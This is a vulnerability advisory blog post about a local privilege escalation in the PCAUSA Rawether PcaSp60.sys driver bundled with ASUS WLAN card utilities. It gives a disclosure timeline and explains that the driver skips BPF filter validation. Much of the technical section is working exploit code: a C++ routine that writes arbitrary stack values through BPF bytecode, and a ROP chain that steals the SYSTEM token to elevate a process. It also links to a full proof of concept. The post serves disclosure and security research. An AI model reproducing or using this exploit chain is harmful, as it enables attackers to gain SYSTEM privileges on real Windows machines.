PCAUSA Rawether for Windows local privilege escalation

Rawether for Windows is a framework that facilitates communication between an application and the NDIS miniport driver. It’s produced by a company named Printing Communications Assoc., Inc. (PCAUSA), which seems to be no longer operating. Company websites can be still reached through web.archive.org:

http://web.archive.org/web/20151017034756/http://www.pcausa.com/
http://web.archive.org/web/20151128171809/http://www.rawether.net/

Rawether framework provides NDIS Protocol Driver similar to the NPF.SYS (part of the WinPcap). This framework is used by many different hardware vendors in their WiFi and router control applications. Exploit attached to this advisory targets 64bit version of PcaSp60.sys driver which is part of ASUS PCE-AC56 WLAN Card Utilities.

Identifying other affected vendors is quite problematic, since Rawether is just a framework it is possible that the driver name, device name or driver version info were changed. Additionally, verifying if the particular software is really vulnerable is sometimes not feasible, because installation package won’t install without specific hardware.

Default naming convention for the affected drivers:

  • PcaSp60.sys
  • PcaSp50.sys
  • PcaMp60.sys
  • PcaMp50.sys

Disclosure timeline

28 Oct 2016 Contacted tdivine@pcausa.com and security@asus.com
2 Nov 2016 ASUS asked about further details
23 Nov 2016 Received beta version of ASUS PCE-AC56 WLAN Card Utilities – it is no longer using vulnerable driver
27 Nov 2016 Asked ASUS if they are also plan to fix other software that is possibly using vulnerable driver (if any)
7 Dec 2016 Tried contacting PCAUSA on the different e-mail address: pcausa@gmail.com
Jan 2017 Further fixes on the ASUS side, some packages are already fixed on the website
Feb 2017
15 Mar 2017 Disclosure, ASUS has not fixed all packages

Technical Details

PcaSp driver implements Berkeley Packet Filter (BPF) mechanism:

https://www.kernel.org/doc/Documentation/networking/filter.txt

BPF filters are compiled into small programs that are executed by BPF virtual machine. BPF VM has two registers and can perform simple load/store/branch/alu operations:

  Instruction  Description
 
      ld           ;Load word into A
      ldi          ;Load word into A
      ldh          ;Load half-word into A
      ldb          ;Load byte into A
      ldx          ;Load word into X
      ldxi         ;Load word into X
      ldxb         ;Load byte into X
 
      st           ;Store A into M[]
      stx          ;Store X into M[]
 
      jmp          ;Jump to label
      ja           ;Jump to label
      jeq          ;Jump on A == k
      jneq         ;Jump on A != k
      jne          ;Jump on A != k
      jlt          ;Jump on A <  k
      jle          ;Jump on A <= k
      jgt          ;Jump on A >  k
      jge          ;Jump on A >= k
      jset         ;Jump on A &  k
 
      add          ;A + <x>
      sub          ;A - <x>
      mul          ;A * <x>
      div          ;A / <x>
      mod          ;A % <x>
      neg          ;!A
      and          ;A & <x>
      or           ;A | <x>
      xor          ;A ^ <x>
      lsh          ;A << <x>
      rsh          ;A >> <x>
 
      tax          ;Copy A into X
      txa          ;Copy X into A
 
      ret          ;Return

Exact implementation of the VM can be looked up in WinPcap sources:

https://github.com/wireshark/winpcap/blob/master/packetNtx/driver/win_bpf.h
https://github.com/wireshark/winpcap/blob/master/packetNtx/driver/win_bpf_filter.c

Rawether driver uses almost exactly the same code with just a small difference. WinPcap calls bpf_validate() function when someone sets the packet filter program and it forbids to set malformed filters. Validation routine performs standard memory load/store checks and simple control flow checks to avoid endless loops and jumping outside of the BPF filter. During filtering stage, BPF program is executed without those checks, since it relies on the one-time validation which was performed earlier. Rawether driver doesn’t perform this validation, thus it is possible to write BPF program that will read/write arbitrary memory (or just endlessly loop, but it is not really interesting).

Read/write address is relative to the current stack position – internal memory that can be accessed from the BPF program is just local array of ints. On x86 platform it is possible to access full 32bit memory address range. On x64, exploit can reliably access only the stack memory, which is sufficient to build working ROP chain. Since BPF program allows write to any stack location, it is very easy to overwrite return address without even touching stack canary (which btw this function doesn’t use).

I’ve started building the payload by defining writeStack() function:

struct bpf_insn
{
    unsigned __int16 code;
    char jt;
    char jf;
    unsigned int k;
    bpf_insn(unsigned __int16 code, char jt, char jf, unsigned int k) : code(code), jt(jt), jf(jf), k(k) {}
};
 
void writeStack(std::vector<bpf_insn>& bytecode, int idx, uint64_t value)
{
    bytecode.emplace_back(bpf_insn(0, 0, 0, value & 0xFFFFFFFF));
    bytecode.emplace_back(bpf_insn(2, 0, 0, 0x12 + 2 * idx));
    bytecode.emplace_back(bpf_insn(0, 0, 0, (value >> 32) & 0xFFFFFFFF));
    bytecode.emplace_back(bpf_insn(2, 0, 0, 0x12 + 2 * idx + 1));
}

Above function performs 4 operations:

    ldi    (value & 0xFFFFFFFF)	; Load low 32bits of value into Accumulator
    st     [0x12 + 2*idx]	; Store Accumulator to memory at [0x12 + 2*idx]
    ldi    (value >> 32)	; Load hi 32bits of value into Accumulator
    st     [0x12 + 2*idx + 1]	; Store Accumulator to memory at [0x12 + 2*idx + 1]

0x12 is the size of the stack frame (divided by 4, because the local memory is represented as an array of ints), so writeStack() can be used to overwrite bpf_filter() return address and all stack frames which are above.

I’ll briefly go through the ROP chain that I’ve created. First stage of the ROP has to reset spinlock which is acquired just before call to bpf_filter():

  // !!! spinlock acquistion here !!!
  v17 = KeAcquireSpinLockRaiseToDpc(&ctx->W32NOpenListSpinLock.SpinLock);
 
  v18 = (_W32N_OPEN_CONTEXT *)ctx->W32NOpenList.Flink;
  ctx->W32NOpenListSpinLock.OldIrql = v17;
  while ( v18 && (_LIST_ENTRY *)v18 != &ctx->W32NOpenList )
  {
    if ( v18 && v18->bRxEnable && v18->nPacketFilter )
    {
      bpfProgram = v18->pBPFProgram;
      if ( bpfProgram && v18->nBPFProgramSize )
      {
        LODWORD(v31) = 0;
        v11 = (unsigned int)bpf_filter(bpfProgram, packetBuffer, packetBufferSizeOut, 0i64, v31, totalPacketSize) != 0;
      }
      else
      {
        v11 = 1;
      }
      if ( v11 )
      {
        v13 = v18;
        break;
      }
    }

or in assembly:

.text:00014A21 48 8D 4E 38           lea     rcx, [rsi+38h]  ; SpinLock
.text:00014A25 FF 15 DD 16 00 00     call    cs:__imp_KeAcquireSpinLockRaiseToDpc

To reset KSPIN_LOCK it is sufficient to set the spin lock value to zero. KSPIN_LOCK value is kept under [rsi + 0x38] during the whole bpf_filter() execution.

    int idx = 0;
    std::vector<bpf_insn> bytecode;
 
    // reset spinlock
 
    // mov    r14, address of any `pop register` gadget
    // mov    rcx, rsi    ; rsi points to the internal context structure
    // call   r14         ; calls `pop register` and proceed to the next gadget
    // mov    dword ptr [rcx + 0x38], eax  ; eax is 0 at this point
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRcxRsiCallR14));
    writeStack(bytecode, idx++, gogo.getSymbol("MovPtrRcx38Eax"));

In next steps I’m getting EPROCESS address of the process that will be elevated (PsLookupProcessByProcessId) and address of “NT AUTHORITY\SYSTEM” EPROCESS using PsGetCurrentProcess. bpf_filter() is called from NDIS_PROTOCOL_DRIVER_CHARACTERISTICS.ReceiveNetBufferListsHandler, from what I saw this handler is called from some NDIS helper thread, thus it has SYSTEM rights. Later, ROP chain overwrites target process token with the token stolen from SYSTEM process and returns the execution to the epilogue of the ReceiveNetBufferListsHandler. Described method can be simplified, but I wrote this exploit before I finished GoGoGadget library and without properly doing the homework with regard to kernel information leaks. Having EPROCESS information leaks in place, calls to PsLookupProcessByProcessId and PsGetCurrentProcess can be skipped, and ROP can just use EPROCESS addresses gathered by ring3 part of the exploit.

    // get current process EPROCESS
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRcx));
    writeStack(bytecode, idx++, myPID);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, pcaBase + 0x7400);
    writeStack(bytecode, idx++, gogo.getSymbol("ntoskrnl.exe", "PsLookupProcessByProcessId"));
    writeStack(bytecode, idx++, gogo.getSymbol("Pop4Times"));
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
 
    // get NT AUTHORITY\SYSTEM EPROCESS
    writeStack(bytecode, idx++, gogo.getSymbol("ntoskrnl.exe", "PsGetCurrentProcess"));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRcx));
    writeStack(bytecode, idx++, 0x358);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::AddRaxRcx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRaxPtrRax));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRbxRax));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRax));
    writeStack(bytecode, idx++, pcaBase + 0x7400);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRaxPtrRax));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::AddRaxRcx));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRcxRbxCallR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovPtrRaxRcx));
 
    // pcaBase + 0x4C89	-> restore registers (without rbx, but it seems to be ok in this case)
    writeStack(bytecode, idx++, pcaBase + 0x4C89);
 
    bytecode.emplace_back(bpf_insn(6, 0, 0, 0));	// return 0, so rax = 0 at the begining of ROP execution

The last bytecode operation is “return 0” so the bpf_filter() function will set the eax register to 0 at the end of the BPF program. I’m using this value to reset spinlock at the begining of the ROP chain.

To enable vulnerable part of the driver, exploit has to issue OID_GEN_CURRENT_PACKET_FILTER NDIS request with NDIS_PACKET_TYPE_ALL_LOCAL flags and set the BPF program. Exploit is triggered by reading the first received network packet.

PoC exploit was tested on Win10 x64 TH2 and RS1 and is available on github:

https://github.com/rwfpl/rewolf-pcausa-exploit

Should work with PcaSp60.sys SHA1: bd44ffa4784cc539c376fccef1315f461af8953e

Comments (0)

› No comments yet.

Leave a Reply

Allowed Tags - You may use these HTML tags and attributes in your comment.

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Pingbacks (0)

› No pingbacks yet.